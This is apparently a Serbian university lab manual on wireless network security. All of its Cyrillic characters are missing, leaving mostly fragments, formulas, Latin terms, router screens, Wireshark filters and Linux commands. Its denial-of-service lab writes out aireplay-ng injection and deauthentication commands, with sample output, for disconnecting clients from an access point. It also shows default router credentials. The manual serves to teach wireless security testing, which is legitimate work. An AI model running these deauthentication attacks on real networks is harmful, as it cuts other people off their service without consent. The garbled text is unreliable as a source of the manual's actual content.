Bks Prirucnik1 PDF

, , ,
, 2012.
: , ,
,
: ,
: , ,
,
: 55
CIP
,
621.396 :004(075.8 )(076)
:
/
. . . [ .] . - :

, 2012 ( : ) . - 161
. : . ; 29 cm
55. - : . 160.
ISBN 978-86-7982-142-3
1. , , 1952- []
) -
COBISS.SR-ID 194074636

.
11 , .
, 2012.

1. ......................................................................... 2
1.1 ..................................................................................................................... 2
1.2 ............................................................................. 3
........................................................................................................................... 3
........................................................................................................................ 4
.......................................................................................................................... 5
........................................................................................................................ 6
....................................................................................................................... 6
......................................................................................................................... 7
....................................................................................... 8
.......................................................................................................... 9
1.3 .......................................................................................................................... 10
1.4 ...................................................................................................................................... 11
............................................................................................................................ 15
................................................................................................. 19
1.5 .................................................................................................................................... 21
1.6 .............................................................................................................................. 23
1.7 ............................................................................................................. 24
1.8 ............................................... 26
: .............................................................................................. 28
1: .................................................................... 28
2.
......................................................................................................... 30
2.1 ................................................................................................................... 30
2.2 - .................................................................... 31
......................................................................................... 31
................................................................................................................... 33
.................................................................................................. 35
- ................................................. 36
...................................................................................................................... 37
- ............................................................... 38
........................................................................ 39
2.3 - .......................................................... 41
1: - ............................................................. 43
2: - ................................................. 44
3.
..................................................................................................................................... 46
3.1 ....................................................... 46
3.2 ........................................................................................................ 47
3.3 LINUX ........................ 47
3.4 ........................................................... 48
3.5 ............................................................................................................................ 49
...................................................................................................................... 49
.................................................................................................................... 50
3.6 ................................................................................................... 50
3.7 . .................................................................................. 54
3.8 .......................................................................................................... 55
4. ................................................................... 58
4.1 .......................................................................................................................................... 58
4.2 .................................................................................... 58
4.3 .............................................................................................. 59
4.4 .................................................................................. 60
4.5 ...................................................................................... 61
4.6 .................................................................................................. 62
4.7 ............................................................................ 63
4.8 MAC ...................................................................... 66
5. ........................................................ 70
5.1 .............................................................................. 70
5.2 BACKTRACK................................................................................................................................ 70
1: BckTrack ................................................. 70
2: ............................................................. 70
3: Linux ................ 71
5.3 ............................................................... 71
4: ............ 72
5.4 KISMET ..................................................................... 73
5: Kismet ............................................................................. 74
6: Kismet ............................................... 80
5.5 WIRESHARK .................. 80
5.6 .................. 80
5.7 MAC .................................................. 81
5.8 ................................................................... 81
5.9 ................................................................................................. 82
5.10 .................................................................................... 82
7: ......................................................... 83
5.11 IEEE 802.11 ........................................................................................ 84
6. ................................. 88
6.1 .......................................................................................................................................... 88
6.2 DOS (DENIAL-OF-SERVICE) .................................... 89
DoS ................................................................. 90
1: ............................. 91
2: ....................................................... 92
................................................................................ 93

3: ................................................... 95
6.3 ................................................................................ 95
4: .................................. 96
6.4 MAC ....................................................................................... 96
5: ..................................................... 97
7. WEP .............................................. 100
7.1 ........................................................................................................................................ 100
7.2 WEP ........................................................................................................... 100
7.3 ............................................................................................................ 101
7.4 WEP ............................................................................................. 103
7.5 WEP ...................................................................................................................... 105
ARP ........................................................................................... 106
1: 64- WEP ................................................................ 108
2: 128- WEP .............................................................. 109
8. WPA/WPA2 .................................. 112
8.1 ........................................................................................................................................ 112
8.2 WPA/WPA2 ........................................................................................................ 112
WPA-PSK WPA2-PSK ............................................................................................................. 112
8.3 WPA-PSK WPA2-PSK........................................................................................ 114
.................................................................................................................... 115
1: WPA ................................................................................... 117
8.4 WPA-PSK/WPA2-PSK ............... 117
9. ................................................................... 122
9.1 ........................................................................................................................................ 122
9.2 .................................................................................. 122
9.3 ....................................................... 123
1: ............................................. 125
2: ............. 125
10. ............ 128
10.1 ................................................................................................................................... 128
10.2 WPA/WPA2-ENTERPRISE .............................................................................. 131
........................... 131
.................................. 135
RADIUS ................................................................................................. 139
................................................................................ 143
.............................................................................................................. 144
1: WPA2-Enterprise ................................. 148
11. MIKROTIK ROUTERS ............................................. 150
11.1 MIKROTIK ROUTEROS .......................................................................................................... 150
11.2 MIKROTIK ...................................................................................... 150
11.3 MIKROTIK ......................................... 152
1: MikroTik .................................................................................... 159
..................................................................................................................................... 160
................................................................................................. 161
I
.

, , .
.
I
1.
1.1
.
,
,
.
.
1,
.
:
=
:
f ,
c ,
.

GSM 900MHz, 33cm.
, 2,4GHz,
12,5cm. , ,
.
, ,
:
, .
, .
, .
,
. FM .
88MHz 108MHz,
.
5m, 5mm,
. , 50m (
) .
.
1 ,
, ,
.
,
. ( ),
(
). , FM (88MHz -108 MHz)
, ( GSM 900MHz
1800MHz) . FM
GSM-, GSM .
( )
( , )
, (. QPSK, 8PSK).
1.2
,
. .
1.1 : ) )
.
( ) , 1.1,
(1 + 1 = 2).
2. ,
, 1.1,
(1 + (-1) = 0). 3.
,
RF4 ( ).

.
2Constructive interference
3Destructiveinterference
4 Radio Frequency
3
I
, ,
.
, .
.

, .

.
.
.
:
.
.
.
.

(
).
: ,
, , . -,
.
-.
- .
.
.
. ,
.
2,4GHz,
(
2,4GHz). -
.

- . o
.
. -
, .
- ( ) 5
. -
.
1.2 : ()
. ,
, .
, , ,
.
( 1.3) .
( 1.3) --
- .
1.3 : ) - )
5Reflection
5
I
()
6( ).
.
1.4 :
,
, .
:
. , , ,
( 1.5). ,

.

( )
. ( 1.6).
6Shadowing
1.5 :
.

, .
.
1.6 :

, ,
(7) . (
1.7). , , 10cm 20cm,
(, ,
...) .
7Scattering
7
I
1.7 :
,
:

, ,

.
,
. 1.8
8 (
).
.
1.8 :

.
, 1.9.
1.9 :
8LOS Line of Sight
,
.
.
.

. (
)
, ,
.
,
n/2, n .
60%
.
:
:
rn n-
d1
d2

10km, 2,4GHz.
17,66m. 28GHz,
5,17m. 60%
,
10,59m
.
6,36m.
1.10
. (
),
. 9 (
) .
, .
9ulti-path propagation
9
I

. ,
,
.
10. GSM 16us
( ),
5km .
1.10 :

.
, ,
.
, .
, .

.
1.10
. .
, , e
.
. 20%
.
-
. ,
.
1.3
,
.
.
10Delay spread
10

(dB).
. , ,
, , .
= 10 [ ]
N , P1 , P2
( ).
, (P2) 1W, (P1)
0.5W, 3dB. , :
0,5
10 = 3,01
1
.
3dB 50%
. , 3dB 100%
.
1.1 P1/P2:

3dB 2
10dB 10
20dB 100
30dB 1.000
40dB 10.000
50dB 100.000
60dB 1.000.000
1.1 : dB
,
, . 1mW. dBm,
:
= 10
1

.
1.4

, .
.
, .
.
11
I
, :
, , , .
.

.
.
. ,
.
, dBi.
,
dBd. :
0dBd = 2,15dBi.
.
(elevation, E-plane) (azimut, H-palne) .
,
.
1.11 .
1.11 :
,
() ,
. , ()
.

(). ,
.
.

. 1.12 .
12

1.12 : Yagi

. (. )
.
Marconi .
1.11 Yagi
.

. .
: ( 1.13), ( 1.13)
( 1.14).
.
.
.
13
I
1.13 : ) )

.
.
1.14 :
, .
.
.
14

.
1.2
.
, .
.

(. ).

-
0dB
20dB
3 dB
(45) 3 dB
20 dB
0 dB
3 dB
(45) 3 dB
( ) ( ) 20 dB
( ) ( ) 0 dB
( ) ( ) 0dB
1.2 : -

.
,
, , .
.
.
: () , , Yagi
.
2,2 dBi .
.
.
, 1.15.
15
I
1.15 : -
, 360
.
, , ,
.
,
.
Cisco AIR-ANT2485P-R 8,5dBi.

.
, 1.16.
1.16 :
1.17
.
16

1.17 : AIR-ANT2485P-R
.
AIR-ANT2485P-R 1.3.
8.5dBi

H-plane 66
E-plane 56
RP-TNC

1.3 : AIR-ANT2485P-R
Yagi .
Yagi-Uda, .
1.18.
.
17
I
1.18 : Yagi
Yagi Cisco AIR-ANT1949.

. ,
.
. Yagi
. , Cisco Yagi ,
.
1.19 : AIR-ANT1949
AIR-ANT1949 1.4.
13.5dBi

H-plane 30
E-plane 25
RP-TNC
/
1.4 : AIR-ANT1949
18

( 1.20) 100
. -
, . Cisco AIR-ANT3338
40km 2Mb/s.
54Mb/s 8km.
1.20 :
21dBi

H-plane 12
E-plane 12
RP-TNC

1.5 :
, ,

. ,
. .
( 1.21) .
19
I
1.21 :
20m,
18,
:

126m .

( 1.22).
20

1.22 :
=
( + )
15.
15 45m.
1.5
HF
(3MHz 30MHz). (), (),
( 1.23)
1.23 :
21
I
.
( ).
. . ,
() .
, .
11. , ,
(dB/m).
.
, . , ,
. ,
,
. :
. .
,
.
, .
.
. (30MHz
300MHz). .
RG58.
, CB12 ( , . -) VHF .
RG213. CB HF . RG-213
.
Heliax ( Foam) ,
. Heliax ( 1.24) ,
LMR . LMR400 ( 1.24) LMR600
Heliax .
1.24 : ) Heliax )LMR400
11Skin effect
12Citizens' Bandradio
22

,
.
1.6
, ,
. (
), , .
.
( ),
.

, .
1.25.
1.25 :
()
. . ,
(TransverseMagnetic), ,
. , (TransverseElectric),
,
. . 10, 11, .
, , .
( ). /2
. , Y ,
.
.

() ().
( )
, .
.
23
I

1.26 :
1.7

, , .
,
.

.
.
BNC 40- . BNC Bayonet
Neill Concelman, Paul
P Neillandd Carl Conncelman.
. BNC
( RG58 RG-179 RG-316).

GHz.
,
10Base2 .
1..27 BNC
B .
1 .27 : BNC
TNC Neill Concelmann.

BNC C
. ,
TNC

12GHz. 1.28 TNC . TNC Threaaded Neill
man.
Concelm
24

1.28 : TNC
'N' ( N Neill, 'Navy'- )

. 18 GHz.
. 1.29 'N' .
1.29 : N
SMA 60- . SMA

SubMiniature version A.
18 GHz. 1.30 SMA
.
1.30 : SMA
SMB - SubMiniature version B. .

4 GHz. 1.31
SMB .
25
I
1.31 : SMB
MCX 80- .
SM 30% .
6 GHz. 1.32 MCX
. (. pigtail),
.
1.32 : MCX
1.8

:
(dBm) = (dBm) + (dB) (dB)
: ,
, , ,
, .
,
:
PRX = PTX + GTX - LTX - LFS - LM + GRX - LRX
:
PRX (dBm),
PTX (dBm),
GTX (dBi),
LTX ( , ) (dB),
LFS (dB),
26

LM , , ... (dB),
GRX (dBi),
LRX ( , ) (dB).

:
4
= 20 log
:
L ,
,
d .

:
= 32,45 [dB] + 20 log( [MHz]) + 20 log( [km])
= 27,55 [dB] + 20 log( [MHz]) + 20 log( [m])
= 36,6 [dB] + 20 log( [MHz]) + 20 log( [mile])

.
.
(dB) = (dBm) (dBm)

. 1.6
.

(dB)
(%)
90 8
99 18
99,9 28
99,99 38
99,999 48
1.6 :

, .
.

.
27
I
:
: 5 km
: 5,8 GHz
: -
-: ( 100 mW,
- 88 dBm, 18 dBi, 2
dB)
100mW , 20 dBm.
:
= 32,45 + 20 log(5,8) + 20 log(5) = 121.67 dB

:
PRX = PTX + GTX - LTX - LFS + GRX - LRX
20 dBm + 18 dBi - 2 dB -121,67 dB + 18 dBi - 2 dB
= -69,8 dBm
, 18,2 dB.
99%
, .
1:

50km. MikroTik RBSXTG-5HnD.
. 99%
.
28
II

.

.
RadioMobile -
-.
II
2.

2.1
,
.

-.
-, , -
, .
-,
.

RadioMobile. ,

.
Roger Coud,
13. RadioMobile online
,
.
RadioMobile :
20MHz 20GHz.
Longley-Rice ITS14-.
.

.
( ,
, , , ...).

- ( - ,
, ...).
RadioMobile .
- .
-.
13 http://www.cplus.org/rmw
14 International Telecommunications Society
30

2.2 -
-
- .
:
1. ,
2. ,
3. ,
4. -,
5. -,
6. - ,
7. .

RadioMobile
.
: SRTM15, DTED16, GTOPO3017, ...

(File/Map Properties).
2.1 :
15 Shuttle Radar Topography Mission

16 Digital Terrain Elevation Data
17 Global 30 Arc Second Elevation Data Set
31
II
( ),
. ( 2.1),
40004000 , 20
( 2.2).
2.2 :
Extract

( 2.3).
.
32

2.3 :
.
.
Google Maps, Yahoo Maps
.
Edit/Merge pictures.
Google Maps ( 2.4)
33
II
2.4 : Merge pictures
Operation, ,
. 2.5
Draw. .
2.5 :
34

.
(File/Network properties/Parameters)
( ), - ,
.
802.11g-TT, -
802.11g .
2400MHz 2495MHz ( 2.6).
2.6 :
(File/Network properties/Topology),
(master), (slave)
(). ( 2.7).
35
II
2.7 :
- (File/Network properties/System)
. - .
.
- ,
.
- Kosutnjak-Master,
2.8.
36

2.8 : -
:
: Arena-Klijent
: 100mW
O : -89dBm
: 0,4dB
: Yagi
: 26dBi
: 25m
-.
,
.
(File/Unit properties),
Toranj-Kosutnjak.
( 2.9).
37
II
2.9 :

Arena.
- a, -
e (File/Network properties/Membership). -
Kosutnjak-Master Toranj-Kosutnjak, -
Arena-Klijent Arena ( 2.10).
38

2.10 : -
- ,
(slave). -
2.10 Antenna direction
- a .
,
, - .
(Tools/Radio Link).
2.11.
39
II
2.11 :

.
. -
, .
:
Azimuth -
Elev. angle
Obstruction
Worst Fresnel
Distance
PathLoss dB
E field
RX level
RX Relative
Google Earth (Edit/Export to/Google Earth),
( 2.12).
40

2.12 : Google Earth
2.3 -

-.
.
- Arena-Klijent
, 26dBi 19dBi
.
(Tools/Radio coverage/Single polar).
( 2.13).
- , -
Arena-Klijent. ( ,
),
-.
.
.
41
II
2.13 :
( Draw), 2.13
- . Yagi ,
.
42

2.14 :
1: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
50m.
.
:
:
TP-Link TA-2448 -
:
TL-WA801ND
0.5dB
?
?
, ?
43
II
2: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
20m.
.
:
:
TP-Link TA-2448 -
TL-ANT2415D -
:
TL-WA801ND
1.5dB
?
?
, ?
44
III

.
.
, .
III
3.

3.1
I 802.11.
- 2,4GHz 5GHz.

, .
, , 1Mb/s
2Mb/s a FHSS (Frequency Hoping Spread Spectrum) DSSS (Direct
Sequence Spread Spectrum).

:
802.11, 54 Mb/s, OFDM
5GHz (5,47GHz - 5,725GHz).
,
.
802.11b, 11 Mb/s, 802.11
2,4GHz , .
DSSS .
802.11g, 54Mb/s, OFDM 2,4GHz
. 802.11b b/g.
802.11n, 600 Mb/s. 2009.
. 802.11n MIMO (multiple-input and
multiple-output) , 2,4GHz, 5GHz,
Channel Bonding-, -
20MHz a 40MHz.
,
, .

,
.
46

3.2
802.11b 802.11g ,
14 22MHz.
. 11 ,
13 . 14. .
.
5MHz. ,

.
5 .
, 1, 6, 11.
3.1 : 2,4Ghz
3.3
Linux
Linux
() . A
(ethx),
( ath0 Atheros ).
MLME (MAC sublayer
management entity) ,
. Linux
API a ,
mac80211, , cfg80211.

. wlanx.
,
:
:
/:
:
iwconfig
:
47
III
?
( IEEE802.11?). ?
?
.
:
iwlist channel
:
?
?
?
,
.
3.4
,
E.
BSS (Basic Service Set) -
.
BSS.

( , ) (Extended Service Set).
(DS).

.
, DS .
(Access Point).

. .

, ,
. . ,
(Managed)

.

,
, .
48

. ,
, ,
,
.
(Indipendent - IBSS) Ad-Hoc .
(Ad-Hoc)
.
( AP, Managed, Ad-Hoc)
() (Monitor, rf-mon).
(. Wireshark,
Kismet).
.

Monitor .
Managed Ad-Hoc, AP
Monitor .
3.5

. , , CSMA/CD
. (CD) .
E .
IEEE 802.11 , , ,
, .
.
IEEE802.11 CSMA/CA (Collision Avoidance).
, .
,
,
CSMA/CA.
(Acknowlgmenet Frame).
, :
RTS CTS .

.
PS-Poll (Power Save Poll). IEEE 802.11
.

.
49
III
CF-End, CF-End+CF-ACK .
, .
DCF (Distributed Coordinated
Function). (Carrier Sence),

, .
DCF,
(Contension Free).
PCF (Point Coordinated Function).
DCF PCF
, CF-End, CF-End+CF-ACK
DCF.
:
Beacon .
Probe request () Probe response () ,
,
.
Authentication Deauthentication
.
Association, Disasociation, Reassociation
.
ATM .
3.6

Wireshark, Monitor .
.
Wireshark, nefiltrirano.cap
, .
,

.
.
:
Statistics Wlan Traffic...
.
SSID (Service Set ID) ,
.
50

, labnet viser,
.
SSID .

BSSID (Basic Service Set ID).
BSSID . BSSID MAC .
Wireshark 24 (OUID- )
).
ESSID (BSSID) Beacon
. .

.
.
Wireless Trafic. (File/Close) nefiltritano.cap.

.
(File/Open) filtrirano.cap
1 2 (Beacon ):
.
(fixed parameters)
(tagged parameters).
.
:
Beacon ad-hoc BSS?
Beacon ?
SSID ?
?
?
(RSN18)?
Probe Request ( 3).

SSID. SSID (SSID=Broadcast),
.
18 Robust Security Network
51
III
Probe Response ( 4).

.
Duration . IEEE 802.11
. CSMA/CA
. 802.11
,
.
.
(Acknowledgement) ( 5).
802.11. ,
, .
.
Probe Response ( 8
9).
:
( 10).
.
( 12).

.
: (Open System), WEP (Wired Equivalent Privacy).
.
, WEP, (
)

. WEP
.
IEEE802.11i .
,
. , IEEE802.11i
.
(Association Request,
Association Response) ( 14-17).
.
. .

.
52

WEP ,
, . WEP
IEEE80.11-2007.
IEEE802.11i
. (Robust
Security Network - RSN) Beacon Probe Response
(RSN information Tagged parameters).
RSN information Beacon ( 32).
IEEE 802.11i
.
WPA WPA2 (Wireless Protected Access).
IEEE 802.11i, WPA
WPA2, je .
WPA TKIP (Temporal Key Integrity Protocol) .
TKIP WEP,
. WEP -
.

WPA2 (Counter Mode with Cipher Block Chaining Message Authentication Code CCM)
. 802.11
RSN .
o
, IEEE 802.1x .
IEEE 802.1x
EAP19 ,
.
, .
WPA Enterprise WPA2 Enterprise,
.

, , (Pre
Shared Key - PSK). WPA Personal WPA2 Personal,
.
RSN (Robust Security
Network) IEEE802.11i,
WPA2 Enterprise.
802.1x (Request, Identity, Response, Identity).
?
19 Extensible Authentication Protocol
53
III
Ko ?
EAP .
? ( 38)
:
.
EAP-Success . ( 80)
RSN (4-way handshake)
. . ( 82-88)
,
.
. DHCP
.
Wireshark:
, Flow Graph.
3.7 .
Beacon , Probe
(ESSID) ,
(BSS), .
Linux , Network Manager .
, iwlist.
:
iwlist scanning
labnet (ESSID: labnet)
MAC , (BSSID)?
Ad-Hoc ?
- ?
, , ?
?
?
?
54

3.8
,
. dBm, mW
1mW.
:
:
iwlist txpower
?
,

.
.
:
iwlist scanning
wavemon,
.

wavemon.
:
xterm
. xterm :
wavemon
:
.
.
.
. F2
, , /.
F2. .

.
55
IV

.
.
IV
4.
4.1
,
. TP-Link
TP-Link WR841N.
,
, .
SOHO20 .
, ,
.
.
.
IP .
DHCP .
web
.
:
http://192.168.1.1
admin admin
4.2
IP 192.168.1.1, (
) , .

.
, . ,
Network, LAN 4.1.
20 Small Ofiice Home Office
58

4.1 : IP
4.3
Network, Wan, ,
( ).
4.2 : IP
4.2 .
59
IV
4.4
.

.
4.3 : DHCP
DHCP (
, , DNS ).
(Default Gateway). DHCP Clients List,
, .
,
. ,
. FTP
,
. Address Reservation ,
MAC IP . 4.4
.
60

4.4 :
4.5
Forwarding.
4 , ,
Virtual Servers. 4.5 -
.
4.5 :
61
IV

. , .
, (.
), .
, .
4.5, , IP ,
, . Forwarding,
DMZ (Demilitarized Zone). IP
.
,
, .

. 4.6
.
4.6 : IP
4.6
Wireless, Wireless Settings ( 4.7):

BKS-1 ( BKS-2 ,
BKS-3 , ...).
.
Channel 1 (6 , 11 ).
Mode 11bgn mixed.
Automatic.
62

300Mbps.
4.7 :

(SSID), .
4.7
Wireless, Wireless Security.

.
WEP (40/64-bit,
104/128-bit 128/154-bit). ,
.
- ASCII .
: WEP 802.11 2007.
. ,
. 4.8
WEP-.
63
IV
4.8 : WEP
WPA-PSK WPA2-PSK ,
.
. WPA2 SOHO
( 4.9):
Version WPA2-PSK.
Encription AES.
PSK Password .
64

4.9 : WPA-PSK/WPA2-PSK
WPA/WPA2
,
. WPA-PSK/WPA2-PSK
, WPA/WPA2 . WPA/WPA2
WPA/WPA2 Enterprise ,
. RADIUS
.
WPA-PSK/WPA2-PSK WPA/WPA2 Enterprise
/, . 4.10
WPA/WPA2 Enterprise .
RADIUS .
65
IV
4.10 : WPA/WPA2 Enterprise
4.8 MAC
MAC .
( )
( 4.11).
66

4.11 : MAC
Wireless Advanced ( 4.12).
4.12 :
:
Transsmit Power - .
Beacon Interval -
.
RTS Treshold RTS/CTS
Fragmentation Treshold .
67
IV
Wireless Statistics
( 4.13).
4.13 :
68
V
Linux -
Back Track, .
Kismet .
Wireshark .
V
5.
5.1
Linux
BackTrack. BackTrack je Ubuntu, Debian
Linux-a. ,
, .
KDE (K Desktop Environment) GNOME
,
. BackTrack
Auditor Security Linux-a WHAX ( Wppix).
21,
BackTrack 5 R3 . BackTrack
, LiveDVD-a
USB .
5.2 BackTrack
BackTrack Live DVD/USB- BIOS-

. startx
.
1: BckTrack
BckTrack 5 R2 Linux .
2:
:
Start / System / Konsole
:
ifconfig
?
, ,
:
ifconfig -a
?
IP ?
(. wlan0)
:
21 http://www.backtrack-linux.org
70

ifconfig wlan0 up
:
ifconfig wlan0 down

IP . IP
DHCP .

.
DHCP , ,
, IP .
3: Linux
:
:
dhclient eth0
eth0
DHCP .
DHCP , :
ifconfig eth0
?
:

:
IP - ifconfig < >
<> netmask < >, (. ifconfig eth0 10.0.0.100 netmask 255.0.0.0
- ifconfig eth0 10.0.0.100/8);
route add
default gw < >, (. route add default gw 10.0.0.1);
route, , ;
DNS resolv.conf
/etc ,
Linux (. nano /etc/resolv.conf
nameserver 10.0.0.10); DNS
- cat /etc/resolv.conf.
5.3
RFMON (Radio Frequency Monitor)

.
71
V
(promiscuous) ,
,
Ad-hoc .
,
.

.
.

Ad-hoc . Windows
, Windows Vista Windows 7
Windows .

Windows . Linux
802.11 .
airmon-ng
. , (Managed)
. :
airmon-ng <start | stop> < > [. ]

airmon-ng <check | check kill>
start | stop ,
;

;
check airmon-ng ;
check kill ;
airmon-ng
.
4:
:
,
,
:
iwconfig
?
72

(IEEE802.11?). ?
?
:
airmon-ng start wlan0
,
:
iwconfig
mon0 .

:
airmon-ng stop mon0

, .
5.4 Kismet
Kismet IEEE 802.11 ,

(sniffer) (Intrusion Detection System).
rfmon, monitor .

. , ,
.
,
Kismet , .

.

, .
Kismet ,
, Beacon
.
,
Wireshark,
(Airsnort).
.
. ,
.
.
73
V
5: Kismet
Kismet BackTrack Linux- :
Start / Backtrack / Radio Network Analysis / 80211 / All / Kismet
kismet, Enter.
( 5.1).
5.1 : Kismet

, .
wlan0 [Add],
( 5.2).
5.2 :
74

.
5.3 .
5.3 : Kismet
. autofit
.
Sort ( 5.4).
5.4 :
75
V
.
?
,
.
,
. 5.5 .
5.5 :
.
. Kismet

. kismet_ui.conf ,
decay 3 .
!,
( 3 ), 5.5
HiHaHo;
..
( 6 ), 5.5
energetics;
.
( 6 ),
5.5 rakac.
(SSID) .
Beacon (. SSID-a cloaking SSID),
, <no ssid> .
:
A (Access Point) .
D (Data Network)
.
76

H (Ad-hoc) Ad-hoc .
P (Probe Request) .
Ch :
802.11b/g , 1-13 (1-14 );
802.11 , 36, 40, 44, 48, 52, 56, 60,64, 149, 153, 157
161.
Pkts .
Size .
, Kismet
.
. :
WEP WPA
.

.
.

(SSID).

.
5.6.
Enter i.
77
V
5.6 :
Kismet .
Client list
Windows . 5.7.
5.7 :
/
Channel details Windows .
5.8 .
78

5.8 : /
Kismet .
()
. Configure channel
Kismet ( 5.9)
.
(dwell ).
5.9 :

. .
dump Wireshark.
79
V
6: Kismet
Kismet .

.
?
.
.
viser labnet.
.
?
.
/ .
Wireshark.
5.5 Wireshark

.
Wireshark - (Capture filters)
- (Disply Filters). -

.

. Wireshark
IEEE 802.11 , 802.11
( ).
5.6

(BSSID). BSSID MAC .
,
.
,
.
:
wlan.bssid eq <MAC >
80

5.7 MAC

( MAC 00:09:5b:e8:c4:03):
wlan.sa eq 00:09:5b:e8:c4:03
MAC ipconfig/all getmac ( Windows
), ifconfig ( Linux ).

, :
wlan.bssid eq 00:11:92:6e:cf:00 and wlan.sa eq 00:09:5b:e8:c4:03
5.8
.
type subtype IEEE 802.11 .
Wireshark Beacon ,
Beacon .

10 (PS)-Poll
11 (RTS)
12 (CTS)
13 (ACK)
14 (CF)-End
15 CF-End + CF-Ack
5.1 :

0 -
1 -
2 -
3 -
4 -
5 -
8 Beacon
10
11
12
5.2 :
Beacon (type=00),
8 (subtype=00).
:
!(wlan.fc.type eq 0 and wlan.fc.subtype eq 8)
81
V
()
Beacon .
, Wireshark
type subtype .
Beacon .
:
wlan.fc.type_subtype ne 8
5.3 .
5.9
Beacon
, .

.
:
wlan.fc.type_subtype eq 32

:
wlan.fc.type eq 2
, ICMP (ping), NULL
, ...
5.10

( ).
. IEEE 802.11
protected bit 1,
(WEP,TKIP CCMP).
:
wlan.fc.protected ne 1
.
:
wlan.fc.protected ne 1 and wlan.fc.type eq 2
82

7:
Wireshark .

.
300 .
.
/ :
/
Management frames wlan.fc.type eq 0
Control frames wlan.fc.type eq 1
Data frames wlan.fc.type eq 2
Association request wlan.fc.type_subtype eq 0
Association response wlan.fc.type_subtype eq 1
Reassociation request wlan.fc.type_subtype eq 2
Reassociation response wlan.fc.type_subtype eq 3
Probe request wlan.fc.type_subtype eq 4
Probe response wlan.fc.type_subtype eq 5
Beacon wlan.fc.type_subtype eq 8
Announcement traffic indication map (ATIM) wlan.fc.type_subtype eq 9
Disassociate wlan.fc.type_subtype eq 10
Authentication wlan.fc.type_subtype eq 11
Deauthentication wlan.fc.type_subtype eq 12
Action frames wlan.fc.type_subtype eq 13
Block ACK Request wlan.fc.type_subtype eq 24
Block ACK wlan.fc.type_subtype eq 25
Power-Save Poll wlan.fc.type_subtype eq 26
Request to Send wlan.fc.type_subtype eq 27
Clear to Send wlan.fc.type_subtype eq 28
ACK wlan.fc.type_subtype eq 29
Contention Free Period End wlan.fc.type_subtype eq 30
Contention Free Period End ACK wlan.fc.type_subtype eq 31
Data + Contention Free ACK wlan.fc.type_subtype eq 33
Data + Contention Free Poll wlan.fc.type_subtype eq 34
Data + Contention Free ACK wlan.fc.type_subtype eq 35
+ Contention Free Poll
NULL Data wlan.fc.type_subtype eq 36
NULL Data + Contention Free ACK wlan.fc.type_subtype eq 37
NULL Data + Contention Free Poll wlan.fc.type_subtype eq 38
NULL Data + Contention Free ACK wlan.fc.type_subtype eq 39
QoS Data wlan.fc.type_subtype eq 40
QoS Data + Contention Free ACK wlan.fc.type_subtype eq 41
QoS Data + Contention Free Poll wlan.fc.type_subtype eq 42
QoS Data + Contention Free ACK wlan.fc.type_subtype eq 43
NULL QoS Data wlan.fc.type_subtype eq 44
83
V
NULL QoS Data + Contention Free Poll wlan.fc.type_subtype eq 46

NULL QoS Data + Contention Free ACK wlan.fc.type_subtype eq 47
5.3 : /
5.11 IEEE 802.11
802.11 .
5.10 : IEEE 802.11
5.4 , Wireshark
.
Frame Control 2 wlan.fc

802.11
.
, 11
.
Version 802.11 wlan.fc.version

.
0.
Type , wlan.fc.type
,
.
Subtype wlan.fc.subtype
.
,
(beacon
frame, authenticate request, disassociate
84

notice, frame, authenticate request,

disassociate notice...).
DS status To DS From DS wlan.fcds

. From DS=1
To DS=0,
. From DS=0
To DS=1,
.
,
Ad-hoc .
,
.
More Fragments wlan.fc.flag

.
.
Retry wlan.fc.retry

.
Power wlan.fc.pwrmgmt
Management ,
.
More Data wlan.fc.moredata

()
.
Protected wlan.fc.protected

.
Order wlan.fc.order
.
.
85
V
Duration . wlan.duration

.

.
Address , wlan.da (destination),

. wlan.sa (source),
(
), wlan.bssid (BSSID),
wlan.ra (receiver)
( ,
BSSID).

.
Fragment Number wlan.frag

.

.
Sequence Number wlan.seq

.

.
4095,
.

.
5.4 : IEEE 802.11
86
VI

. ,
, .
VI
6.
6.1

. IEEE 802.11 ,
:

.
.
.
.
,
.
.

. -
. ,
.

. , 802.11, "" .
, .
.
, .
:
,
.
(poor configuration) .
. ,
.
(poor encryption).

.
.
,
.
88

6.2 DoS (denial-of-service)
DoS ,
.
, DoS .
OSI
. ,
, .

.
,
.
, .
.
.
jamming-to-signal (J/S), ,
.
,
. ,
, .
J/S , ,
:
:
Pj - ,
Pt - ,
Gjr - - ,
Grj - - ,
Grt - - ,
Gtr - - ,
Br - ,
Bj - ,
Rtr - ,
Rjr - ,
Lj - ,
Lr - .
ERP (Effective Radiated Power) ,
, .
89
VI
, ,
, . ,
.
.
,
.
WLAN ,
, , ,
. , WLAN ,
. WLAN
.
. ,
,
. , ,
.
OSI
.
DoS
,
.
. ,
(.
), .
802.11 ,
( ).
DoS .
,
MAC .
, ()
.
, ,
.
DoS :
(cloked SSID);
WPA/WPA2 ;
ARP , WEP . Windows
ARP 22.
22 disconnect
90

,
.
aireplay-ng.
,
(injection)
. aireplay-ng.
1:
.
:
:
:
:
iwconfig
, :
aireplay-ng
.
,
aireplay-ng -9 mon0
- -9 aireplay-ng ,
- mon0 .
, :
16:29:41 mon0 channel: 9
16:29:41 Trying broadcast probe requests...
16:29:41 Injection is working!
16:29:42 Found 5 APs
,
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D mon0
:
-0
aireplay-ng ;
1 . 0,
;
-a 00:14:6C:7E:40:80 MAC ;
91
VI
- 00:0F:B5:AE:CE:9D MAC
, ;
mon0 .
:
10:01:45 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80)
on channel 1
10:01:45 Sending 64 directed DeAuth. STMAC:
[00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
aireplay-ng ,
aireplay-ng 128 .
64 . [61 | 63 ACKs],
:
[ ACK | ACK
];
1
, ;
.
,
.
MA ,
, Kismet airodump-ng.
2:
.
:
- SSID spec_lab1 (, spec_lab2, spec_lab3, ...)
- 1 ( 6, 11, ...)
- :
- IP : 172.17.32.100/24
- Default gataway: 172.17.32.1/24
- DNS : 172.16.1.13
1
Manager .
:
airmon-ng stop mon0
:
iwconfig wlan0 essid <SSID>
wlan0 DHCP :
92

dhclient wlan0
.
,
:
ping <IP >
2 .
airodump-ng .
airodump-ng mon0
Wireshark mon0 .
MAC :
aireplay-ng -0 1 -a < > -c <
> mon0
.
?
802.11 ,
SN. SN 12 .
SN .
, 4095.
. 6.11 SN (599, 600, 601 602).
93
VI
6.1 : SN
6.2 45 46.
, (
23 - ). SN
MAC .
44 47, SN 637 638, .
MAC
SN 1957 1958, .
23 Broadcast
94

6.2 :

, .
SN 24.
3:
